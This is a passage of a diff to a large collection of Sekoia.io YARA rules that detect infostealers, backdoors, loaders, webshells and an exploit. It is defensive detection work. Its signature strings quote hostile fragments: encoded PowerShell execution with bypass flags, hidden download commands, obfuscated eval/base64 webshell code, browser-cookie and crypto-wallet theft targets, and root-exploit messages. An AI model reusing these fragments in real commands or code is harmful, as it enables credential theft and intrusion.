-		$ = "#@rt12!@$$$nnMF##"
-		$ = "messi(d)))"
+		$s1 = "Agniane.pdb" ascii
+		$s2 = "Agniane.exe" wide ascii
 
 	condition:
-		2 of them and filesize < 80KB
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 3MB and 2 of them
 }
-rule SEKOIA_Infostealer_Win_Titan : FILE
+rule SEKOIA_Infostealer_Win_Agrat : FILE
 {
 	meta:
-		description = "Finds samples of the Titan Stealer"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "0adbe616-0d91-4b05-b7a8-812cd79f9252"
-		date = "2023-01-12"
+		id = "472effe8-5044-4ca1-88e0-3e19d445b9d1"
+		date = "2022-06-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_titan.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_agrat.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "996dc320c83f57c47afe50ad032bac43ad1fbfbbd5a86e517089a062b0382993"
+		logic_hash = "5b02880dbc75d9e4d95ec55c8e8630a47198ee4cc25e3ff79c93e9fe634fadca"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246890,61 +246897,69 @@ rule SEKOIA_Infostealer_Win_Titan : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "/sendlog" ascii
-		$str1 = "/stealer/grabfiles.go" ascii
-		$str2 = "/stealer/installedsoft.go" ascii
-		$str3 = "/stealer/screenshot.go" ascii
-		$str4 = "/stealer/sendlog.go" ascii
-		$str5 = "/stealer/userinformation.go" ascii
-		$str6 = "C:/Program Files (x86)/Steam/config/" ascii
-		$str7 = "/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/" ascii
-		$str8 = "MAC Adresses:" ascii
-		$str9 = "/Coowon/Coowon/" ascii
-		$str10 = "_/C_/Users/admin/Desktop/stealer_v7/stealer" ascii
+		$str00 = "Vault.txt" wide
+		$str01 = "Credman.txt" wide
+		$str02 = "[Networks] {0}" wide
+		$str03 = "[Screenshot] {0}" wide
+		$str04 = "[Twitch] {0}" wide
+		$str05 = "Servers.txt" wide
+		$str06 = "[WindscribeVPN] {0}" wide
+		$str07 = "[{0}] Thread finished!" wide
+		$str08 = "[ERROR] Unable to enumerate vaults. Error (0x" wide
+		$str09 = "snowflake-ssh" wide
+		$str10 = "//setting[@name='Password']/value" wide
+		$str11 = "MakeScreenshot" ascii
+		$sys = "System.Collections.Generic.IEnumerator<Stealer." ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16( 0 ) == 0x5A4D and all of them and #sys > 10
 }
-rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor : FILE
+rule SEKOIA_Implant_Win_Quantum_Builder_Lnk
 {
 	meta:
-		description = "Detects Muddys manifestation JScript backdoor"
+		description = "Detect .LNK files created using Quantum Builder"
 		author = "Sekoia.io"
-		id = "998fb0ab-73ed-41e5-b87e-f987b8f05a8c"
-		date = "2022-01-13"
+		id = "65f8a426-8bf3-4f7f-b7d2-fd8da5b660f7"
+		date = "2022-06-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_manifestation_backdoor.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_quantum_builder_lnk.yar#L1-L44"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "477ed53ccd337dd21ab84b7d36b995a653d0aad6676e02cbe5e9f581bface253"
+		logic_hash = "dd090af0e062b633173ac8483d8659e1fd8aa7898c641714fbe4b30bdd276b3d"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 30
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "/^\\s+|\\s+$/g" ascii
-		$l2 = "while (1) {" ascii
-		$l3 = { 57 53 63 72 69 70 74 2e 73 6c 65 65 70 28 ?? ?? 20 2a 20 31 30 30 30 29 3b }
-		$s4 = ")+ key , false)" ascii
-		$s5 = ")+ data , false)" ascii
+		$magic_lnk = { 4C 00 00 00 01 14 02 00 }
+		$powershell_ascii = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+		$powershell_wide = "powershell.exe" wide
+		$start = "<#" wide
+		$end = "#>" wide
+		$foreach = "=$Null;foreach(" wide
+		$return = "};return" wide
+		$char = "[char]" wide
+		$aes = "New-Object 'System.Security.Cryptography.AesManaged'" wide nocase
+		$base64 = "[System.Convert]::FromBase64String" wide nocase
+		$decryptor = "CreateDecryptor();" wide nocase
 
 	condition:
-		filesize > 1000 and ( $l3 in ( @l2 .. @l2 + 300 ) ) and ( any of ( $s* ) )
+		$magic_lnk at 0 and all of ( $powershell* ) and ( $start and $end and $foreach and $return and $char or $aes and $base64 and $decryptor )
 }
-rule SEKOIA_Apt_Mustangpanda_Malicious_Lnk_Worm : FILE
+rule SEKOIA_Apt_Mustangpanda_Coolclient : FILE
 {
 	meta:
-		description = "Detects MustangPanda infected ThumbDrive"
+		description = "Detect COOLCLIENT via obfuscation & specific string"
 		author = "Sekoia.io"
-		id = "e7cc5ecc-2369-49ff-9e35-c9faeb69acda"
-		date = "2023-09-21"
+		id = "2f8fdb66-03a2-400f-808b-56ae1b276d2f"
+		date = "2023-03-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_malicious_lnk_worm.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_coolclient.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ca19a925af695cbbb41fdfbb161dceafeb8aae6d42000cc09bb07e1dbdfdb9e5"
+		logic_hash = "9fd552604299ecb8fa28042ee26e72bbe4fb9804ad087bf4a373b2c2e17d43b0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246952,23 +246967,25 @@ rule SEKOIA_Apt_Mustangpanda_Malicious_Lnk_Worm : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RECYCLER.BIN\\1\\CEFHelper.exe" wide
+		$s1 = {eb 14 ea 50 eb 0b ea 8b c4 a8 01 74 06 eb 0b}
+		$s2 = {66 0f d6 44 24 eb eb}
+		$s3 = "c:\\windows\\syste" fullword
 
 	condition:
-		uint32be( 0 ) == 0x4C000000 and 1 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Suspected_Sandworm_Sdelete_Wiper : FILE
+rule SEKOIA_Bumblebee_Loader : FILE
 {
 	meta:
-		description = "Detects Sdelete wiper"
+		description = "Detect the BUMBLEBEE loader"
 		author = "Sekoia.io"
-		id = "c1419b11-33e5-4280-b92a-039719cb17d3"
-		date = "2023-10-25"
+		id = "8fd795c7-6896-498c-a892-de9da6427b60"
+		date = "2022-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_suspected_sandworm_sdelete_wiper.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bumblebee_loader.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "094b946b89cfb475b8692f88af73fa8768a933139e0df9d6e7d7aa8614d3ab14"
+		logic_hash = "73c0195c51b5f8c36ab6d7a0e783f1229709d51fc42e2486c02fa65bbbdf955b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246976,25 +246993,26 @@ rule SEKOIA_Apt_Suspected_Sandworm_Sdelete_Wiper : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".exe -accepteula -r -s -q" wide
-		$s2 = "sdelete [-p passes] [-r]" wide
-		$s3 = "!This program cannot be run in DOS mode."
+		$str0 = { 5a 00 3a 00 5c 00 68 00 6f 00 6f 00 6b 00 65 00 72 00 32 00 5c 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 5c 00 6d 00 64 00 35 00 2e 00 63 00 70 00 70 00 }
+		$str1 = "/gate" ascii
+		$str2 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
+		$str3 = "BLACK" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and $s1 and $s2 and #s3 == 2 and filesize < 500KB
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022 : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Obfuscated : FILE
 {
 	meta:
-		description = "Detects tje Saitama backdoor"
+		description = "Detects obfuscated version of PowerShower"
 		author = "Sekoia.io"
-		id = "4ea8c27f-c441-4616-a29b-2b5dfdd3bd20"
-		date = "2022-05-13"
+		id = "f76ab9d8-7753-4a17-aedd-fc9c3b8cd322"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_saitama_backdoor_may2022.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_obfuscated.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b3876995fde9c26052c39859684cec05e8c1bc8e2a62946b49ed328e84499dc6"
+		logic_hash = "fdb1edb3982eb5356cdf5fd1fa9fcc41d5048848b2a05589e87836ac0b05ec7a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247002,187 +247020,140 @@ rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 7E [4] 7E [4] 59 0A 02 8E 69 06 28 [4] D1 0B 02 16 7E [4] 7E [4] 07 }
-		$ = "systeminfo | findstr" wide
-		$ = "powershell -exec bypass -enc" wide
-		$ = "SendAndReceive : {0}" wide
-		$ = "SleepSecond : Start" wide
+		$s1 = "{0}{1}{2}{3}{4}{5}{6}{7}{8}" ascii wide
+		$s2 = "{000}{001}{002}{003}{004}{005}{006}{007}{008}" ascii wide
+		$s3 = "::Unicode.GetString([System.Convert]::FromBase64String(" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of them
+		($s1 in ( 0 .. 100 ) or $s2 in ( 0 .. 100 ) ) and $s3 in ( filesize -200 .. filesize )
 }
-rule SEKOIA_Crypter_Vbs_To_Exe
+rule SEKOIA_Hacktool_Socat_Strings : FILE
 {
 	meta:
-		description = "first stage of Crypter-VBS-to-EXE dropped on infected hosted"
+		description = "Detects socat"
 		author = "Sekoia.io"
-		id = "33ed286f-3055-452e-952b-abaf11a543a1"
-		date = "2023-01-03"
+		id = "7c7e4085-39b2-445e-a9ff-52f21936e714"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crypter_vbs_to_exe.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_socat_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4b3a411de3f36a7f9a310e1b789988c3d9d53eb195d04b374bdf1e5b4157b1e9"
+		logic_hash = "8f0c907fa2de4141c55073ea5b4a8174f50c716fc7a60d3e838115859a938084"
 		score = 75
-		quality = 55
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$theDot = ":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" ascii
-		$s1 = "cmd.exe /c curl" ascii
-		$s2 = "WScript.Sleep(3000)" ascii
-		$s3 = "runCmd = \"cmd.exe /c powershell.exe -exec Bypass -C \" + myVar +" ascii
-		$s4 = "WshShell.Run \"cmd /c \" & runCmd, 0, True" ascii
+		$ = "[options] <bi-address> <bi-address>"
+		$ = "version %s on %s"
+		$ = "socat_signal():"
 
 	condition:
-		#theDot> 200 and all of ( $s* )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
 }
-rule SEKOIA_Infostealer_Win_Xfiles : FILE
+rule SEKOIA_Apt_Blackwood_Nspx30_Plugin : FILE
 {
 	meta:
-		description = "Detect the X-FILES infostealer based on specific strings"
+		description = "Detects plugins of NSPX30 backdoor based on RTTI and rundll32 string"
 		author = "Sekoia.io"
-		id = "3ad3ee19-6be8-484b-943c-05813cdcbd18"
-		date = "2022-02-03"
+		id = "ef8e0d51-c78c-426b-8008-910e27546f23"
+		date = "2024-01-29"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/3xp0rtblog/status/1375206169384521730"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_xfiles.yar#L1-L50"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_blackwood_nspx30_plugin.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "404ee02fa1905f49c3c3ca525cfb3c5ba1d2ec46554239035c1891d21f547a2c"
+		logic_hash = "cf7c232a5a817ff5c0da04744abf99ed2fcea587e3e6f6e8bf3aef7ca8f2b51b"
 		score = 75
-		quality = 78
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xfi0 = "Telegram bot - @XFILESShop_Bot" wide
-		$xfi1 = "Telegram support - @XFILES_Seller" wide
-		$brw0 = "\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" wide
-		$brw1 = "\\Chromium\\User Data\\Default\\Cookies" wide
-		$brw2 = "\\Slimjet\\User Data\\Default\\Cookies" wide
-		$brw3 = "\\Vivaldi\\User Data\\Default\\Cookies" wide
-		$brw4 = "\\Opera Software\\Opera GX Stable\\Cookies" wide
-		$brw5 = "\\Opera Software\\Opera Stable\\Cookies" wide
-		$crp00 = "Tronlink" wide
-		$crp01 = "NiftyWallet" wide
-		$crp02 = "MetaMask" wide
-		$crp03 = "MathWallet" wide
-		$crp04 = "Coinbase" wide
-		$crp05 = "BinanceChain" wide
-		$crp06 = "GuardaWallet" wide
-		$crp07 = "EqualWallet" wide
-		$crp08 = "BitAppWallet" wide
-		$crp09 = "iWallet" wide
-		$crp10 = "Wombat" wide
-		$crp11 = "Zcash" wide
-		$crp12 = "Armory" wide
-		$crp13 = "Bytecoin" wide
-		$crp14 = "Jaxx" wide
-		$crp15 = "Exodus" wide
-		$crp16 = "Ethereum" wide
-		$crp17 = "AtomicWallet" wide
-		$crp18 = "Guarda" wide
-		$crp19 = "Coinomi" wide
-		$crp20 = "Litecoin" wide
-		$crp21 = "Dash" wide
-		$crp22 = "Bitcoin" wide
+		$s1 = {2E 3F 41 56 43 43 61 62 69 6E 65 74 40 40}
+		$s2 = {2E 3F 41 56 43 45 6E 63 6F 64 65 72 40 40}
+		$s3 = "rundll32.exe \"%hs\",#1" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $xfi* ) or 5 of ( $brw* ) and 20 of ( $crp* )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Pe_Stealer_Scarletstealer_Strings : FILE
+rule SEKOIA_Bot_Win_Yamabot : FILE
 {
 	meta:
-		description = "ScarletStealer strings"
+		description = "Detect the Yamabot implant used by Lazarus"
 		author = "Sekoia.io"
-		id = "ca930851-513f-44e5-abb4-ca0edfde3428"
-		date = "2023-12-15"
+		id = "9f5b85c4-59e3-448f-b054-5b4932ee89bb"
+		date = "2023-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/pe_stealer_scarletstealer_strings.yar#L1-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_win_yamabot.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "308055cbe960614112682585b5709a62c2639752df07661d6b2bb13e390b3b08"
+		logic_hash = "cb183cbf9703d96b5f463d635885eab66e0d36c4763752a5cb934538ada60ec3"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f"
+		hash2 = "66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66"
+		hash3 = "74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643"
+		hash4 = "def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563"
 
 	strings:
-		$s1 = "Scarlet Client" wide
-		$s2 = "] PC NAME:   (" wide
-		$s3 = "] IP:   (" wide
-		$s4 = " - Wallets -" wide
-		$s5 = "] Exodus:  (" wide
-		$s6 = "] Electrum:  (" wide
-		$s7 = "] Atomic:  (" wide
-		$s8 = "] Guarda:  (" wide
-		$s9 = "] Coinomi: (" wide
-		$s10 = "] Monero:  (" wide
-		$s11 = "] Ledger:  (" wide
-		$s12 = "] Bitbox:  (" wide
-		$s13 = "] Trezor:  (" wide
-		$s14 = ") Support: PointX@exploit.im - @isPointX" wide
-		$a2 = "/config/tk.txt" wide
-		$a3 = "/config/chatid.txt" wide
-		$a1 = "telebyt.com" wide
+		$s1 = "_/D_/Bot/YamaBot/"
+		$s2 = "Go build ID: \"ujRRNborth3MgXzS7HTu/aYhLszO8_95srnr8Fk1n/Xr8P792kGZ_VUqOQVc97/kgx_H7YuMZBl2Ajyac2M\""
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 2MB and 13 of ( $s* ) and 2 of ( $a* )
+		uint16be( 0 ) == 0x4d5a and 1 of them and filesize > 3MB
 }
-rule SEKOIA_Loader_Win_Batloader_Scripts : FILE
+rule SEKOIA_Tool_Webshell_B374K_Strings : FILE
 {
 	meta:
-		description = "Finds BatLoader samples based on the specific download URL"
+		description = "Detects b374k webshell"
 		author = "Sekoia.io"
-		id = "31a04ad3-74f8-4aa5-b3fc-df792bdc71b5"
-		date = "2022-11-30"
+		id = "f53fc668-e1fc-4b85-b850-59aceefb6418"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_batloader_scripts.yar#L1-L30"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_webshell_b374k_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "aab6c7780bbc7bed8994b4e70129107bb7b719642fae92b1d3f9146eb11efabc"
+		hash = "1d27b23fceecbb9e854c41f6a8fb878e"
+		hash = "71fd853a3f3efc3dc2846e866187ee59"
+		hash = "187e001c32487d0d68197ddb7e7796c3"
+		hash = "6eac497dfc1020a8475e95542fad197e"
+		hash = "61c6a0bc15efa442853f04bb276ac96e"
+		logic_hash = "b085a50d50fc1fd06d6f75397cf1fa6fa1bc4a0d18b56ed3458990f4abde0632"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$url = /https?:\/\/[^\s]{15,35}\/index\/[^\s]{1,40}servername=msi/ ascii wide
-		$str00 = "Invoke-WebRequest" ascii wide
-		$str01 = "PSScriptRoot" ascii wide
-		$str02 = "Add-MpPreference" ascii wide
-		$str03 = "Install-GnuPG" ascii wide
-		$str04 = "wmic computersystem get domain" ascii wide
-		$str05 = "ArpInfo" ascii wide
-		$str06 = "$script:List_ProccesCheck" ascii wide
-		$str07 = "Get-Process -Name" ascii wide
-		$str08 = "f001_SetProcessList" ascii wide
-		$str09 = "var WshShell" ascii wide
-		$str10 = "WScript.Sleep" ascii wide
-		$str11 = "WshShell.Run" ascii wide
-		$str12 = "powershell Invoke-WebRequest" ascii wide
-		$str13 = "-nop -w hidden " ascii wide
+		$ = "$func('$x','ev'.'al'.'("
+		$ = "(ba'.'se'.'64'.'_de'.'co'.'de($x)))"
 
 	condition:
-		$url and 2 of ( $str* ) and filesize < 50KB
+		2 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Aridviper_Rustsysjoker : FILE
+rule SEKOIA_Webshell_Icesword_Strings : FILE
 {
 	meta:
-		description = "Detects Rust Sysjoker variant via PDB path or key and Rust string"
+		description = "Detects icesword webshell"
 		author = "Sekoia.io"
-		id = "14ff3f76-0371-4b45-9864-bf69c74e60aa"
-		date = "2023-11-27"
+		id = "2c6b3cec-4200-4386-8cd5-4004c9b5b96a"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aridviper_rustsysjoker.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/webshell_icesword_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cb3c5d37095c27aa169a6aa61fa12972ff71877c615eaa254c3906ef10c662a9"
+		hash = "0447352827e61696304a8e3d34e1d270"
+		hash = "f49cfcda0abdefa385eda7ec7e7a5411"
+		hash = "e1518388375ba772ed20503ec6dc6c8a"
+		hash = "ecf08cd6af127e01f913354529174a23"
+		logic_hash = "25ea8c1f4756595e63f09dfdfd1cb0e9bbf1d05e46150e22993de95d9f758385"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247190,142 +247161,158 @@ rule SEKOIA_Apt_Aridviper_Rustsysjoker : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$Rust = "called `Option::unwrap()` on a `None` value"
-		$Key = "QQL8VJUJMABL8H5YNRC9QNEOHA"
-		$PDB = "C:\\Code\\Rust\\RustDown-Belal\\target\\release\\deps\\RustDown.pdb"
+		$ = "&fsAction=rename&newName="
+		$ = "&fsAction=copyto&dstPath="
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and ( $PDB or ( $Rust and $Key ) )
+		2 of them and filesize < 100KB
 }
-
-rule SEKOIA_Rootkit_Lin_Winnti : FILE
+rule SEKOIA_Infostealer_Win_Stealerium : FILE
 {
 	meta:
-		description = "Rootkit used by Winnti"
+		description = "Detects Stealerium based on specific strings"
 		author = "Sekoia.io"
-		id = "c800038e-7f8a-4f24-bf0b-06aba6a828cb"
-		date = "2024-05-22"
+		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
+		date = "2022-12-01"
 		modified = "2024-12-19"
-		reference = "https://x.com/naumovax/status/1792902386295394629"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rootkit_lin_winnti.yar#L4-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stealerium.yar#L1-L36"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d57f9190d2d0c65dad6378d705328c0e9ef679eb8dad75af77d4bbc4f9d0f8d9"
-		score = 40
-		quality = 80
+		logic_hash = "f420848164ad4b6966f2a776a58d90b7d70c8b151a42d6f56b654f1700b5e564"
+		score = 75
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "161344ae61278e09eacb1c76508cda45555eee109e6d6a031716a096ab5c84f3"
-		hash2 = "bb56e088739b281c9f56b4fa3fa4d285e45b32c4f9f06b647d7e8cb916054e1a"
-		hash3 = "777c1fda4008f122ff3aef9e80b5b5720c9f2dbc3d7e708277e2ccad1afd8cc5"
-		hash4 = "9c770b12a2da76c41f921f49a22d7bc6b5a1166875b9dc732bc7c05b6ae39241"
 
 	strings:
-		$ = "[CDATA[%s]]></name><type>%o</type><perm>%o</perm><user>%s:%s</user><size>%llu</size><time>%s</time></LIST>"
-		$ = "HideFile"
-		$ = "DownThread"
-		$ = "PortforwardThread"
-		$ = "HidePidPort"
-		$ = "DownFile"
-		$ = "ReadReConnConf"
-		$ = "DecRemotePort"
-		$ = "DecRemoteIP"
+		$stl = "Stealerium" ascii wide
+		$str01 = "Processe: " wide
+		$str02 = "Compname: " wide
+		$str03 = "Language: " wide
+		$str04 = "SandBoxie: " wide
+		$str05 = "== System Info ==" wide
+		$str06 = "== Hardware ==" wide
+		$str07 = "== Domains ==" wide
+		$str08 = "WEBCAMS COUNT: " wide
+		$str09 = "[Virtualization]" wide
+		$str10 = "[Open google maps](" wide
+		$str11 = "Remember password: " wide
+		$str12 = "Target.Browsers.Firefox" ascii
+		$str13 = "Modules.Keylogger" ascii
+		$str14 = "ClipperAddresses" ascii
+		$str15 = "ChromiumPswPaths" ascii
+		$str16 = "DetectedBankingServices" ascii
+		$str17 = "DetectCryptocurrencyServices" ascii
+		$str18 = "CheckRemoteDebuggerPresent" ascii
+		$str19 = "GetConnectedCamerasCount" ascii
+		$str20 = "costura.discord-webhook-client.dll.compressed" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 6 of them and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" )
+		uint16( 0 ) == 0x5A4D and filesize > 1MB and ( ( #stl > 5 and 2 of ( $str* ) ) or 15 of ( $str* ) )
 }
-rule SEKOIA_Exploit_Linux_Eop_Cve20177308_Strings : CVE_2017_7308 FILE
+rule SEKOIA_Observerstealer : FILE
 {
 	meta:
-		description = "Detects CVE-2017-7308 exploit"
+		description = "detection based on the strings"
 		author = "Sekoia.io"
-		id = "72d225dd-386c-47d5-afb3-c6712c0bdd9a"
-		date = "2023-12-08"
+		id = "52314870-c100-441d-9ccf-07588325a401"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_cve20177308_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/observerstealer.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c9fd605ced8bb2c3861f642cdc08b99b320ee19658ce60f1b9679a1ccc427bf7"
+		logic_hash = "690bd5a16e780884641a66f06256a4147c092788f155644a8589d38b70dc4acc"
 		score = 75
-		quality = 80
-		tags = "CVE-2017-7308, FILE"
+		quality = 55
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[.] SMEP & SMAP bypass enabled, turning them off"
-		$ = "[.] done, SMEP & SMAP should be off now"
-		$ = "[.] executing get root payload %p"
-		$ = "[.] done, should be root now"
+		$s1 = "URLOpenBlockingStreamW" ascii
+		$s2 = "processGrabber" wide
+		$s3 = "grabbers" wide
+		$s4 = {2F 00 73}
+		$s5 = "UNKNOWN_HWID" ascii
+		$s6 = {48 00 57 00 49 00 44}
 
 	condition:
